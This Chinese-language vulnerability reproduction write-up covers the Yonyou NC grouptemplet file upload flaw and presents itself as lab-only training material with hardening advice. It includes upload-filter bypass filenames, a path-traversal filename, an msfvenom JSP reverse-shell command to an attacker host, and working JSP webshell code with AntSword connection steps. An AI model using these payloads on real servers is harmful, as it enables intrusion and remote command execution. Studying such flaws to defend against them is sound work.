1. 项目概述一次典型的企业级应用漏洞深度剖析最近在梳理一些历史漏洞案例准备内部安全培训材料时又翻到了用友NC这个老熟人。作为国内ERP领域的巨头其产品的安全性牵动着无数企业的神经。今天要拆解的这个漏洞编号XVE-2024-8857涉及grouptemplet接口的任意文件上传。别看它只是一个文件上传点在特定配置下它可能成为攻击者打入内网、获取服务器权限的致命入口。我之所以选择复现并详细记录这个漏洞是因为它非常典型——它暴露了在复杂业务系统开发中开发人员对上传功能的风险认知不足、过滤机制存在逻辑缺陷等共性问题。对于安全研究人员这是一个绝佳的分析样本对于企业运维和开发人员这是一次深刻的安全警示。无论你是想了解漏洞原理、学习手工复现技巧还是想为自己的系统排查类似风险这篇从实战角度出发的复盘笔记应该都能给你带来一些实实在在的参考。2. 漏洞背景与核心原理深度解析2.1 用友NC系统与漏洞接口定位用友NCNew Century是一款面向大型企业集团的高端ERP产品采用B/S架构通常使用Java开发运行在Tomcat、WebLogic等中间件上。其系统庞大模块众多grouptemplet群组模板功能通常是系统内用于管理或上传某些模板文件的模块。攻击者发现的这个漏洞接口路径通常类似于/uap/nc/xxx/grouptemplet具体路径可能因版本而异其本意是允许授权用户上传模板文件以供业务使用。问题的核心在于这个接口在对上传文件进行校验时存在严重的逻辑缺陷。它可能只在前端JavaScript进行了简单的文件扩展名检查或者在后端虽然进行了检查但检查逻辑可以被绕过。例如可能使用了不完整的黑名单如只拦截.jsp但放过了.jspx、.jsp.或者在对文件名进行处理如去除空格、特殊字符时产生了非预期的结果导致攻击者可以上传包含恶意代码的脚本文件如JSP、JSPX文件。2.2 任意文件上传漏洞的通用危害链理解这个漏洞的危害需要把它放到整个攻击链里看。攻击者利用此漏洞的典型路径如下漏洞探测与利用攻击者发现未授权或已授权通过弱口令等其他漏洞获取可访问的grouptemplet接口构造特殊的HTTP请求绕过过滤成功将一句话木马如JSP Webshell上传到服务器指定目录。权限获取通过浏览器直接访问上传成功的Webshell文件地址该文件会被服务器端的Java容器如Tomcat解析执行。攻击者从而获得了在服务器上执行任意命令的能力权限等同于运行Tomcat服务的系统用户如tomcat用户。内网渗透以被攻陷的服务器为跳板攻击者可以进行内网扫描、横向移动窃取数据库敏感数据这正解释了热搜词中“用友nc 登陆cant get connection from database”可能是一种攻击后的异常现象或是攻击者尝试连接数据库时触发的错误甚至植入勒索病毒对企业造成实质性损害。这个漏洞的危险等级通常为“高危”或“严重”因为它提供了直接的代码执行能力是攻击者最喜爱的漏洞类型之一。注意本文所有复现操作均在**本地或授权授权的合规测试环境如Vulhub靶场**中进行旨在帮助理解漏洞原理和提升防御能力。严禁对任何未授权系统进行测试或攻击。3. 复现环境搭建与核心工具准备3.1 靶场环境选择与部署为了安全、可控地复现漏洞我们不需要去找一个真实的用友NC系统。最佳实践是使用漏洞靶场。这里我推荐两种方式方案一使用Vulhub一键搭建Vulhub是一个开源的漏洞复现环境集合通过Docker Compose编排可以快速搭建各种漏洞环境。虽然Vulhub官方可能尚未收录XVE-2024-8857但其复现思路和工具准备是通用的。我们可以用一个类似的Java文件上传漏洞环境如某个旧版Struts2的上传漏洞来模拟和练习攻击手法。这能让我们专注于漏洞利用的本质而非特定版本的安装。# 假设我们使用一个存在上传漏洞的Java靶场 git clone https://github.com/vulhub/vulhub.git cd vulhub/某个java-upload-vuln-directory docker-compose up -d部署成功后访问http://your-ip:8080即可看到靶场应用。方案二自行构建简易模拟环境如果你希望更贴近用友NC的架构可以快速搭建一个Spring Boot或Servlet的Web应用故意编写一个存在缺陷的文件上传接口。例如创建一个UploadController使用RequestParam(“file”) MultipartFile file接收文件但只检查文件名是否以.jsp结尾而忽略了大小写、空格、双扩展名等绕过技巧。这种方式能让你从代码层面深刻理解漏洞成因。3.2 必备工具清单及用途说明工欲善其事必先利其器。以下是复现此类漏洞的常用工具我将它们分为探测、利用和辅助三类工具类别工具名称主要用途关键参数/技巧探测与抓包Burp Suite Community拦截、重放、修改HTTP请求是发现和测试上传漏洞的核心。配置浏览器代理127.0.0.1:8080在Proxy - Intercept中捕获请求使用Repeater模块反复测试。浏览器开发者工具 (F12)快速查看前端代码、网络请求禁用前端JS验证。Network标签页查看原始请求Sources标签页查看前端过滤逻辑可手动禁用JS。漏洞利用中国蚁剑(AntSword)/哥斯拉(Godzilla)图形化Webshell管理工具连接上传成功的木马进行文件管理、命令执行等。需要准备对应的JSP/PHP等木马配置连接时注意密码、编码器与木马匹配。MSFVenom(Metasploit)生成各类Payload包括JSP格式的命令执行木马。msfvenom -p java/jsp_shell_reverse_tcp LHOST攻击机IP LPORT端口 -f raw shell.jsp手工制作Webshell最灵活的方式一个最简单的JSP Webshell可能只有几行代码。例如% Runtime.getRuntime().exec(request.getParameter(cmd)); %辅助与扫描Dirsearch / Gobuster目录扫描用于发现潜在的grouptemplet或其他上传点。python3 dirsearch.py -u http://target.com -e jsp,do,actionNmap端口与服务探测了解目标服务器开放了哪些服务如Tomcat默认8080。nmap -sV -p 1-10000 target_ip实操心得Burp Suite的Intruder模块在测试模糊绕过如测试各种文件名后缀时非常强大但Community版有速度限制。对于初学者熟练使用Repeater进行手工测试更能加深理解。另外AntSword的插件生态丰富安装“虚拟终端”插件后操作体验接近真实Shell。4. 漏洞复现过程全记录与深度分析4.1 信息收集与漏洞点探测复现的第一步是找到攻击入口。对于已知漏洞XVE-2024-8857我们已知接口路径涉及grouptemplet。但在真实未知测试中步骤会更复杂端口与服务识别使用Nmap扫描目标发现开放了8080端口运行着Apache Tomcat服务。这初步确认了它是一个Java Web应用。目录与接口发现使用Dirsearch或Gobuster结合常见路径字典如/uap/,/nc/,/portal/等用友常见路径扫描Web目录。目标是发现像/uap/nc/xxx/grouptemplet这样的上传接口。有时这些接口可能存在于JS文件或HTML注释中需要仔细查看页面源码。接口功能分析通过浏览器访问疑似上传页面如果有的话上传一个正常文件如图片同时用Burp Suite抓包。观察请求的URL路径确认是否为漏洞接口。HTTP方法通常是POST。参数名文件内容对应的参数名常见如file、uploadFile、fileData等。请求格式通常是multipart/form-data。响应信息成功或失败时服务器返回的提示可能隐含了过滤规则如“文件类型不允许”。4.2 绕过技巧实战从黑名单到文件写入假设我们已经找到了上传接口http://target:8080/uap/nc/web/grouptemplet/upload并且通过抓包看到了上传请求。现在开始尝试绕过。4.2.1 初探基础黑名单绕过很多系统的防御策略是黑名单禁止上传.jsp,.jspx,.php等。我们可以尝试以下变种大小写绕过shell.Jsp、shell.JSP。在Windows服务器上文件系统不区分大小写这可能成功。双写/嵌套扩展名shell.jsp.jpg、shell.jsp.jsp。如果后端只检查最后一次出现的.后面的后缀或者检查逻辑有误可能被绕过。空格/点号绕过shell.jsp.末尾加点、shell.jsp末尾加空格。在某些处理逻辑中这些字符可能在检查后被去除导致实际存储的文件名变回shell.jsp。利用解析特性shell.jsp;.jpg、shell.jsp%00.jpg空字节截断在特定老旧环境或配置下可能有效。这些手法利用了服务器或中间件在解析文件名时的特性。操作实录在Burp Repeater中将抓到的上传包发送过来。找到filename”normal.jpg”这部分将其修改为filename”shell.jsp;.jpg”。发送请求观察响应。如果返回了文件路径如/upload/temp/shell.jsp;.jpg则尝试访问http://target:8080/upload/temp/shell.jsp;.jpg。关键点Tomcat等容器可能将;后的内容视为参数从而只解析shell.jsp部分导致JSP代码被执行。4.2.2 进阶Content-Type与文件头欺骗有些系统不仅检查扩展名还会检查HTTP请求头中的Content-Type或者读取文件内容的头几个字节魔数。修改Content-Type将Content-Type: image/jpeg与恶意JSP文件一起发送。这只能绕过极初级的前端或简单的后端检查。添加文件头魔术字节在一个真实的JSP Webshell内容前面加上图片的文件头例如GIF的GIF89a。制作方法可以用copy命令Windows或cat命令Linux# Linux/Mac printf ‘GIF89a\n’ fake.gif.jsp cat jsp_webshell.txt fake.gif.jsp然后上传fake.gif.jsp。如果后端只进行了简单的文件头校验可能会认为这是一个GIF文件而放行。但Tomcat在解析时会根据.jsp扩展名将其当作JSP执行。4.2.3 终极手段路径遍历与自定义目录如果系统将上传文件保存到了可Web访问的目录如Web根目录下的/upload/那么上传Webshell就等于直接可以访问。更危险的情况是如果上传功能允许自定义保存路径通过参数控制或者存在路径遍历漏洞攻击者可能将文件写到更关键的目录比如Web根目录本身。尝试路径遍历修改上传请求中的文件名参数为filename”../../../../webapps/ROOT/shell.jsp”。这试图让文件跳出预设的上传目录直接写到Tomcat的根应用下。查找已存在文件覆盖有时系统允许覆盖已有文件。如果知道某个已存在的JSP文件路径通过信息收集或错误信息泄露可以尝试覆盖它。注意事项在实际复现中一种方法不行就快速尝试下一种。Burp Suite的Intruder模块可以自动化测试一个包含各种绕过Payload的字典极大提高效率。但务必注意频繁的恶意请求可能触发目标系统的WAF或入侵检测规则。4.3 Webshell上传与连接验证当绕过成功服务器返回了上传文件的存储路径例如{“code”:0, “data”:{“path”:”/upload/20240527/abcdefg.jsp”}}最关键的一步就到了。准备Webshell我们使用一个功能简单的JSP Webshell作为示例内容如下将其保存为cmd.jsp% page importjava.util.*,java.io.*% % String cmd request.getParameter(cmd); if (cmd ! null) { Process p Runtime.getRuntime().exec(cmd); OutputStream os p.getOutputStream(); InputStream in p.getInputStream(); DataInputStream dis new DataInputStream(in); String disr dis.readLine(); while ( disr ! null ) { out.println(disr); disr dis.readLine(); } } %这个Shell通过cmd参数接收系统命令并执行回显。上传与访问将cmd.jsp的内容作为文件主体利用前面找到的绕过方法例如使用shell.jsp;.jpg的文件名通过Burp Suite发送上传请求。成功后根据返回的路径在浏览器中访问http://target:8080/upload/20240527/abcdefg.jsp?cmdwhoami。验证执行如果页面返回了运行Tomcat服务的用户身份如tomcat或root则证明漏洞复现成功任意命令执行已实现。使用管理工具连接为了更方便地操作可以将这个Webshell地址配置到中国蚁剑中。在蚁剑中添加数据URL填写完整的Webshell地址连接密码留空因为我们的简单Shell没有密码编码器根据情况选择默认通常可以然后连接。连接成功后即可在图形化界面中浏览服务器文件、执行终端命令等。5. 漏洞根因分析与安全加固建议5.1 代码层面问题溯源通过复现过程我们可以反向推断出用友NCgrouptemplet接口可能存在以下一个或多个编码缺陷未校验文件内容仅根据客户端不可信的文件名filename或Content-Type进行判断没有对文件内容进行真正的格式校验如图片文件头、文件幻数。黑名单机制不健全使用的黑名单列表不完整遗漏了.jspx,.jspf等同样可执行的Java服务器页面扩展名或者没有进行大小写统一处理。文件名解析逻辑缺陷在去除文件名中特殊字符空格、点、分号时顺序或逻辑错误导致过滤被绕过。例如先去除空格再检查后缀那么shell.jsp就能绕过。目录控制缺失上传文件后使用了用户可控的输入如原文件名直接拼接生成存储路径未进行规范化处理导致了路径遍历漏洞。权限控制缺失该上传接口可能未与严格的会话认证、权限校验绑定导致未授权访问或低权限用户越权使用。5.2 企业级防御方案与加固措施对于企业使用用友NC或其他自研系统必须采取多层次的安全措施来防御此类漏洞1. 紧急缓解措施运维侧升级与补丁立即关注用友官方安全公告为受影响的NC版本安装最新的安全补丁。这是最直接有效的方法。临时屏蔽如果无法立即升级可在WAFWeb应用防火墙或反向代理如Nginx层面对包含grouptemplet路径的请求进行拦截或严格检查。权限最小化确保运行Tomcat等中间件的系统用户如tomcat权限尽可能低禁止其执行高危命令、写入系统关键目录。2. 根本性修复方案开发侧白名单校验将文件扩展名检查改为白名单机制只允许上传业务必需的类型如.jpg,.png,.pdf,.docx。同时在后端使用统一的、大小写不敏感的方式检查扩展名。// 示例白名单检查 String[] allowedExt {“jpg”, “png”, “pdf”, “docx”}; String fileExt getFileExtension(filename).toLowerCase(); // 统一转小写 if (!Arrays.asList(allowedExt).contains(fileExt)) { return error(“文件类型不允许”); }文件内容校验对于图片、文档等文件应读取文件头部的魔数Magic Number进行真实性校验而不仅仅依赖扩展名。重命名与不可执行目录上传文件后使用随机生成的文件名如UUID替换原文件名并强制指定安全的存储扩展名如.upload。更重要的是将上传目录设置为不可被Web服务器直接解析执行脚本的路径或者通过配置如Tomcat的default servlet禁止执行该目录下的JSP等脚本。安全框架使用成熟的安全框架来处理文件上传如Apache Commons FileUpload的严格配置Spring框架的MultipartFile结合自定义验证器。3. 常态化安全监测入侵检测在服务器上部署HIDS主机入侵检测系统监控Web目录下是否有新的JSP/JSPX文件被创建监控Tomcat进程是否执行了异常命令。日志审计确保应用和中间件的访问日志、错误日志完整开启并定期审计特别关注对上传接口的异常访问和错误请求。定期漏洞扫描与渗透测试对线上系统定期进行专业的安全扫描和渗透测试主动发现潜在风险。6. 复现过程中的常见问题与排查技巧在复现这类漏洞时你可能会遇到各种“坑”。下面是我总结的一些常见问题及解决方法问题现象可能原因排查思路与解决方案上传返回成功但访问4041. 文件未上传到Web可访问目录。2. 文件名被修改路径预测错误。3. 服务器对文件做了重命名或移动。1. 仔细分析上传成功的响应报文看是否返回了完整的URL或相对路径。2. 尝试目录遍历猜测常见上传路径如/upload/,/files/,/static/等。3. 如果可能触发一个正常文件上传观察其存储规律。上传被拦截返回“非法文件”等提示1. 前端JS校验未绕过。2. 后端有较强的黑名单或简单的内容检查。1. 使用Burp Suite抓包确认请求是从Burp发出完全绕过浏览器。2. 尝试更冷门的扩展名如.jspx,.jspf、大小写、添加空格/点等绕过技巧。3. 尝试修改Content-Type为image/jpeg等。访问Webshell返回500错误或空白页1. Webshell代码语法错误与容器环境不兼容。2. 服务器端有安全软件删除了恶意文件。3. 文件内容在传输中被修改如编码问题。1. 换用更简单、更通用的Webshell代码测试。2. 上传一个纯文本文件测试是否成功确认上传功能本身是否正常。3. 检查Burp中发送的请求体确保文件内容完整正确特别是特殊字符的编码。使用蚁剑/哥斯拉连接失败1. Webshell密码或加密器不匹配。2. 服务器网络策略禁止外部连接。3. Webshell代码被WAF或安全组件拦截。1. 先用浏览器直接带参数访问Webshell确认其能正常执行命令。2. 检查蚁剑连接配置特别是URL、密码、编码器是否与Webshell类型对应。3. 尝试使用更隐蔽的Webshell或自定义编码器。命令执行成功但无回显1. Webshell代码的回显部分有问题。2. 服务器环境导致命令输出流异常。1. 在Webshell中尝试输出一个简单字符串如out.println(“test”);测试回显功能。2. 尝试将命令输出重定向到Web目录下的一个文件然后读取该文件内容。独家避坑技巧从简单到复杂不要一上来就用复杂的加密Webshell。先用一个最简单的、能执行echo “test”的脚本来证明漏洞存在再升级功能。善用Burp的Compare功能当你用一个正常文件上传成功再用恶意文件上传失败时用Burp的Compare功能对比两个请求的原始数据差异点可能就是过滤机制所在。关注服务器错误日志如果条件允许查看Tomcat的catalina.out或localhost.log日志里面经常会记录JSP编译错误、安全拦截等信息是极佳的调试线索。理解中间件配置Tomcat的web.xml中配置了default servlet来处理静态文件了解哪些URL模式由它处理哪些由JSP servlet处理有助于理解文件为何能或不能被解析执行。复现漏洞的最终目的绝非为了攻击。而是通过亲手实践将抽象的安全威胁转化为具体、可感知的风险场景从而更深刻地理解安全编码的重要性并能在自己的项目中构建更坚固的防线。每一次成功的复现都应该对应着一次对自身系统安全状况的审视和加固。